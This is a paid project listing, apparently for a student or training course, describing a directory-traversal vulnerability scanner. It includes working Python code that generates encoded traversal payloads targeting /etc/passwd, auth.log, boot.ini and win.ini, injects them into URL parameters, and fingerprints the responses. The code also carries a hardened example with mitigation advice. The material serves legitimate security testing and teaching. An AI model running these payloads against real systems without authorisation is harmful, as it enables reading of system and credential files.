
Directory traversal exploit finder

Why Choose This Project

Directory Traversal (Path Traversal) is a critical web vulnerability in which an attacker manipulates a user-supplied file path so that the application reads files outside the directory it intended to serve, such as /etc/passwd on Linux or C:\Windows\win.ini on Windows. This tool detects whether a web application is vulnerable by fuzzing URL parameters and file inputs with traversal payloads and checking whether the response contains the contents of a known system file. Finding and confirming this class of bug is a core skill for ethical hackers, bug bounty hunters, and web security testers.

What You Get in This Project

A scanner that detects directory traversal vulnerabilities in URLs or file paths by automatically injecting payloads and checking for unintended file access. It shows severity, test vectors, and mitigation steps.

Technology Stack

Layer        Technologies Used
Frontend     HTML, CSS, JavaScript, Bootstrap
Backend      Python (Flask) or Node.js (Express)
Scanner      Python: requests, urllib; or Node: axios, path
Database     SQLite / MongoDB (optional, for scan logs)
Report Tool  PDF generation: reportlab (Python) or jsPDF (JavaScript)

How It Works

  1. User Inputs Target URL
    Users submit a target URL with possible file input (e.g., file=path/to/file.txt).

  2. Scanner Loads Payload List
    Common traversal payloads like ../, ..%2F, %2e%2e/, ..\\, and double-encoded versions are loaded.

  3. Request Injection
    Each payload is injected into the target parameters to replace the file path.

  4. Response Analysis
    The scanner analyzes responses for signs of sensitive files:

    • Linux: /etc/passwd, /var/log/auth.log

    • Windows: boot.ini, windows/win.ini

  5. Detection & Logging
    A request is flagged as vulnerable only when the response status is 200 and the body carries the target file's signature (for example, a line matching root:x:0:0: for /etc/passwd or a [fonts] section for win.ini). Status 200 on its own is not evidence: many applications return 200 for error pages, and an error page that echoes the payload back would otherwise be a false positive.

  6. Result Display
    A detailed report shows:

    • URL tested

    • Payload used

    • Vulnerable or not

    • Suggested mitigation

  7. Report Export
    Users can download the scan report.
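The scanner core described in steps 2 to 5, as an added example that is not the project's own code. It assumes the file name is passed in a query parameter (default `file`) and injects the network call, so it runs offline against a constructed vulnerable application that joins the decoded parameter onto a web root with no canonicalisation check; `requests.get` can be substituted for a real target. The hardened variant of the fake application shows the mitigation the report should recommend.

```python
"""Directory-traversal scanner core (added example; not the project's code).

Offline by design: `fetch` is a function url -> (status, body). `fake_app`
below is a constructed target that percent-decodes the query once, like a
real framework, so plain and single-encoded payloads work against it while
double-encoded and backslash payloads do not.
"""
import posixpath
import re
from urllib.parse import parse_qsl, quote, urlencode, urlsplit, urlunsplit

# Content fingerprints for each target file. auth.log has no fixed header,
# so its pattern is a heuristic; the other three are stable file markers.
SIGNATURES = {
    "/etc/passwd": re.compile(r"^root:[^:]*:0:0:", re.M),
    "/var/log/auth.log": re.compile(r"sshd\[\d+\]:|pam_unix\("),
    "boot.ini": re.compile(r"\[boot loader\]", re.I),
    "windows/win.ini": re.compile(r"\[(fonts|extensions)\]|for 16-bit app support", re.I),
}

MITIGATION = ("Resolve the path, confirm it stays under the allowed base directory, "
              "or map user input to an allow-list of file names instead of a path.")


def build_payloads(target, depth=6):
    """Traversal variants for one target file: plain, backslash, URL-encoded,
    %2e%2e and double-encoded, for 1..depth levels of '..'."""
    target = target.lstrip("/")
    out = []
    for d in range(1, depth + 1):
        up = "../" * d
        out += [
            up + target,                                  # ../../etc/passwd
            ("..\\" * d) + target.replace("/", "\\"),     # ..\..\etc\passwd
            quote(up, safe="") + target,                  # ..%2F..%2Fetc/passwd
            "%2e%2e/" * d + target,                       # %2e%2e/%2e%2e/etc/passwd
            quote(quote(up, safe=""), safe="") + target,  # ..%252F (double-encoded)
        ]
    return out


def inject(url, param, payload):
    """Replace `param` in the URL's query with the raw payload. The payload is
    appended without re-encoding, otherwise '%2F' would become '%252F'."""
    parts = urlsplit(url)
    rest = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    query = urlencode(rest)
    query += ("&" if query else "") + f"{param}={payload}"
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))


# Constructed in-memory filesystem for the fake target.
WEB_ROOT = "/var/www/files"
FAKE_FS = {
    "/var/www/files/readme.txt": "public file\n",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
}


def fake_app(url, hardened=False):
    """Constructed target. Vulnerable form: web root + decoded input, no check.
    Hardened form: reject any resolved path that leaves the web root."""
    name = dict(parse_qsl(urlsplit(url).query)).get("file", "")   # decoded once
    path = posixpath.normpath(posixpath.join(WEB_ROOT, name))
    if hardened and not path.startswith(WEB_ROOT + "/"):
        return 400, "bad path"
    body = FAKE_FS.get(path)
    return (200, body) if body is not None else (404, "<h1>Not found</h1>")


def scan(url, param="file", fetch=fake_app, depth=6):
    """Return one finding per target file whose signature appears in a 200 body."""
    findings = []
    for target, sig in SIGNATURES.items():
        for payload in build_payloads(target, depth):
            status, body = fetch(inject(url, param, payload))
            # 200 alone proves nothing; the body must carry the file's fingerprint.
            if status == 200 and body and sig.search(body):
                findings.append({"url": url, "param": param, "payload": payload,
                                 "file": target, "severity": "High",
                                 "mitigation": MITIGATION})
                break  # one working payload per file is enough for the report
    return findings


if __name__ == "__main__":
    for f in scan("http://target.example/download?file=readme.txt"):
        print(f"VULNERABLE {f['param']}={f['payload']} -> {f['file']}")
```

To run against a live target, pass `fetch=lambda u: (lambda r: (r.status_code, r.text))(requests.get(u, timeout=10))`; keep the signature check as the deciding test rather than the status code.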

Key Features

Feature                        Description
Automated Payload Injection    Injects multiple traversal payloads into each parameter automatically
Cross-platform Checks          Targets both Linux and Windows system files
Response Fingerprinting        Matches response bodies against known file content, such as the root entry of /etc/passwd
Exploit Report                 Highlights the vulnerable parameter, the working payload and the recommended fix
PDF/CSV Export                 Downloadable vulnerability report
REST API Support (Optional)    Integration with CI/CD pipelines or external dashboards
Custom Payload Upload          Option to add your own traversal payloads

This Course Fee:

₹ 2499 /-

Project includes:
  • Customization: Fully
  • Security: High
  • Performance: Fast
  • Future Updates: Free
  • Total Buyers: 500+
  • Support: Lifetime